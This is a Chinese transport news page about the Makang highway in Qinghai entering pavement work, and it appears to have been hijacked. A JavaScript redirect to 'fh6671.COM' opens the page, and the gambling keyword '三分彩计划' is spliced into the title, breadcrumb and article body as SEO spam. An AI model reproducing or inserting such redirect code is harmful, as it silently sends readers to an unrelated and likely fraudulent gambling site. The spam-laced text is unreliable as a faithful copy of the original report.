function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 图片新闻

青海省黄南藏族自治州尖扎县境内的马康公路进入路面施工阶段

2020-11-13 09:57:47 来源:中国交通新闻网 作者:特约记者 杨青山 文 吴刚 摄

image.png

三分彩计划近日,位于青海省黄南藏族自治州尖扎县境内的马康公路进入路面施工阶段(如图)。目前,项目正在进行路面的垫层、水稳基层和沥青路面作业。 马康公路全长19.3公里,沿线临靠黄河,环保要求很高,被交通运输部列为品质工程示范项目,也是青海省首个品质工程、绿色工程二合一的公路建设工程,预计明年6月30日全线通车。 

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。